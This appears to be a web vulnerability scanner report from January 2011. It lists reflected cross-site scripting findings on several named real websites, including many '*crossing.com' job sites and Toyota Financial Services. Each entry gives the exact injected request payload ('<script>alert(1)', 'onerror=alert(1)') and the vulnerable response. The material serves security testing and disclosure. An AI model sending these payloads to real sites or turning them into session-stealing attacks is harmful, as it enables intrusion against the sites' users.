| GET /?29083"><script>alert(1)< Host: www.qaqccrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Sat, 22 Jan 2011 01:26:02 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=vsmun0sght Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:26:02 GMT Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:26:02 GMT Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:26:02 GMT Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:26:02 GMT Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:26:02 GMT Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:26:02 GMT Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:26:02 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 120308 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.radiocrossing |
| Path: | / |
| GET /?6983f"><script>alert(1)< Host: www.radiocrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 23:39:21 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=a94a3oatt4 Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:39:21 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:39:21 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:39:21 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:39:21 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:39:21 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:39:21 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:39:21 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 113039 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.realestat |
| Path: | / |
| GET /?ef9e9"><script>alert(1)< Host: www.realestateandlan Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 23:43:06 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=bsc5erjjrs Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:43:06 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:43:06 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:43:06 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:43:06 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:43:06 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:43:06 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:43:06 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 133027 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.recruitin |
| Path: | / |
| GET /?16149"><script>alert(1)< Host: www.recruitingcrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:29:32 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=492145tgm4 Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:32 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:32 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:32 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:32 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:32 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:32 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:32 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 105635 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.researchi |
| Path: | / |
| GET /?c5ee5"><script>alert(1)< Host: www.researchingcrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 23:42:49 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=divi8ktvms Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:49 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:49 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:49 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:49 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:49 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:49 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:49 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 113020 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.retailcrossing |
| Path: | / |
| GET /?93fb6"><script>alert(1)< Host: www.retailcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 23:38:55 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=ste5haotf5 Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:38:55 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:38:55 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:38:55 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:38:55 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:38:55 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:38:55 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:38:55 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 105739 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.sciencesc |
| Path: | / |
| GET /?f0897"><script>alert(1)< Host: www.sciencescrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 23:42:11 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=8sa88hljrj Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:11 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:11 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:11 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:11 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:11 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:11 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:11 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 139746 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.scientist |
| Path: | / |
| GET /?28639"><script>alert(1)< Host: www.scientistcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 23:42:51 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=iurdrjelo6 Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:51 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:51 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:51 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:51 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:51 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:51 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:51 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 107101 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.sellingcr |
| Path: | / |
| GET /?117a5"><script>alert(1)< Host: www.sellingcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:29:34 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=dhcgj2evje Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:34 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:34 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:34 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:34 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:34 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:34 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:34 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 130413 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.sqlcrossing |
| Path: | / |
| GET /?66ef3"><script>alert(1)< Host: www.sqlcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 23:42:20 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=imr0t828o1 Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:20 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:20 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:20 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:20 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:20 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:20 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:20 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 109142 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.teenagerc |
| Path: | / |
| GET /?d8279"><script>alert(1)< Host: www.teenagercrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:29:01 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=9of761brn2 Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:02 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:02 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:02 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:02 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:02 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:02 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:02 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 99732 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.telecomcr |
| Path: | / |
| GET /?8c307"><script>alert(1)< Host: www.telecomcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Sat, 22 Jan 2011 01:25:03 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=hkpor3jiob Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:25:04 GMT Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:25:04 GMT Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:25:04 GMT Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:25:04 GMT Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:25:04 GMT Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:25:04 GMT Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:25:04 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 111870 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.toyotafin |
| Path: | /consumer/ShowBinary/BEA |
| GET /consumer/ShowBinary/BEA Host: www.toyotafinancial.com Proxy-Connection: keep-alive Referer: http://www.toyotafin Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ofsc=6bvzN5JHhqXFWZd |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 19:27:52 GMT Content-length: 235 Content-type: text/html <html> <title>Get Primary Binary Error</title> <body> The following error occurred while trying to display property: <p> Error authenticating to repository: BEA Repository8452f<img src=a onerror=alert(1) <p> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.toyotafin |
| Path: | /consumer/ShowBinary/BEA |
| GET /consumer/ShowBinary/BEA Host: www.toyotafinancial.com Proxy-Connection: keep-alive Referer: http://www.toyotafin Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ofsc=6bvzN5JHhqXFWZd |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 19:27:53 GMT Content-length: 237 Content-type: text/html <html> <title>Get Primary Binary Error</title> <body> The following error occurred while trying to display property: <p> Node: /tfs9f005<script>alert(1)< <p> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.toyotafin |
| Path: | /consumer/ShowBinary/BEA |
| GET /consumer/ShowBinary/BEA Host: www.toyotafinancial.com Proxy-Connection: keep-alive Referer: http://www.toyotafin Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ofsc=6bvzN5JHhqXFWZd |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 19:27:58 GMT Content-length: 237 Content-type: text/html <html> <title>Get Primary Binary Error</title> <body> The following error occurred while trying to display property: <p> Node: /tfs/en_USb750d<script>alert(1)< <p> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.toyotafin |
| Path: | /consumer/ShowBinary/BEA |
| GET /consumer/ShowBinary/BEA Host: www.toyotafinancial.com Proxy-Connection: keep-alive Referer: http://www.toyotafin Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ofsc=6bvzN5JHhqXFWZd |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 19:28:00 GMT Content-length: 236 Content-type: text/html <html> <title>Get Primary Binary Error</title> <body> The following error occurred while trying to display property: <p> Node: /tfs/en_US/videof2843<script>alert(1)< <p> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.toyotafin |
| Path: | /consumer/ShowBinary/BEA |
| GET /consumer/ShowBinary/BEA Host: www.toyotafinancial.com Proxy-Connection: keep-alive Referer: http://www.toyotafin Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ofsc=6bvzN5JHhqXFWZd |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 19:28:01 GMT Content-length: 237 Content-type: text/html <html> <title>Get Primary Binary Error</title> <body> The following error occurred while trying to display property: <p> Node: /tfs/en_US/video/contentce625<script>alert(1)< <p> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.toyotafin |
| Path: | /consumer/ShowBinary/BEA |
| GET /consumer/ShowBinary/BEA Host: www.toyotafinancial.com Proxy-Connection: keep-alive Referer: http://www.toyotafin Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ofsc=6bvzN5JHhqXFWZd |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 19:28:03 GMT Content-length: 237 Content-type: text/html <html> <title>Get Primary Binary Error</title> <body> The following error occurred while trying to display property: <p> Node: /tfs/en_US/video/content <p> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.toyotafin |
| Path: | /consumer/tfs.portal |
| GET /consumer/tfs.portal? Host: www.toyotafinancial.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 18:46:17 GMT Content-type: text/html;charset=UTF-8 Content-Language: en Set-Cookie: ofsc=nGJrN5JZyqT9YnT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html> <head> <title >Toyota Financial Services</title><meta name="bea ...[SNIP]... () { //alert("openInterme var requestURI = window.location.href; var paramname='http://www var from = "pg_ForwardEstimator6c74b";alert(1)/ var URL = '/consumer/jsp/tfs var wid = screen.availWidth; var hei = screen.availHeight; if ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.toyotafin |
| Path: | /consumer/tfs.portal |
| GET /consumer/tfs.portal? Host: www.toyotafinancial.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 18:46:19 GMT Content-type: text/html;charset=UTF-8 Content-Language: en Set-Cookie: ofsc=slvdN5JblW6q2TL Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html> <head> <title >Toyota Financial Services</title><meta name="bea ...[SNIP]... ion = 8; // Minor version of Flash required var requiredMinorVersion = 0; // Minor version of Flash required var requiredRevision = 0; var pageLabel ='pg_ForwardEstimatore1488';alert(1)/ var hasReqestedVersion = false; hasReqestedVersion = DetectFlashVer(requi //alert('hasReqested ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://www.toyotafi |
| Path: | /consumer/tfs.portal |
| GET /consumer/tfs.portal? Host: www.toyotafinancial.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; ofsc=FTJHN5JcXX4n9z4 |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 19:55:27 GMT Content-type: text/html;charset=UTF-8 Content-Language: en Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html> <head> <title >Toyota Financial Services</title><meta name="bea ...[SNIP]... { //alert("openInterme var requestURI = window.location.href; var paramname='http://www var from = "pg_ResourceCenterHome693dd";alert(1)/ var URL = '/consumer/jsp/tfs var wid = screen.availWidth; var hei = screen.availHeight; if ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://www.toyotafi |
| Path: | /consumer/tfs.portal |
| GET /consumer/tfs.portal? Host: www.toyotafinancial.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; ofsc=FTJHN5JcXX4n9z4 |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 19:55:32 GMT Content-type: text/html;charset=UTF-8 Content-Language: en Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html> <head> <title >Toyota Financial Services</title><meta name="bea ...[SNIP]... n = 8; // Minor version of Flash required var requiredMinorVersion = 0; // Minor version of Flash required var requiredRevision = 0; var pageLabel ='pg_ResourceCenterHomeda0ab';alert(1)/ var hasReqestedVersion = false; hasReqestedVersion = DetectFlashVer(requi //alert('hasReqested ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.tradingcr |
| Path: | / |
| GET /?f33a8"><script>alert(1)< Host: www.tradingcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Sat, 22 Jan 2011 01:23:53 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=9bdnnh8975 Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:23:53 GMT Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:23:53 GMT Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:23:53 GMT Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:23:53 GMT Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:23:53 GMT Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:23:53 GMT Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:23:53 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 97304 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.trainingc |
| Path: | / |
| GET /?77df3"><script>alert(1)< Host: www.trainingcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
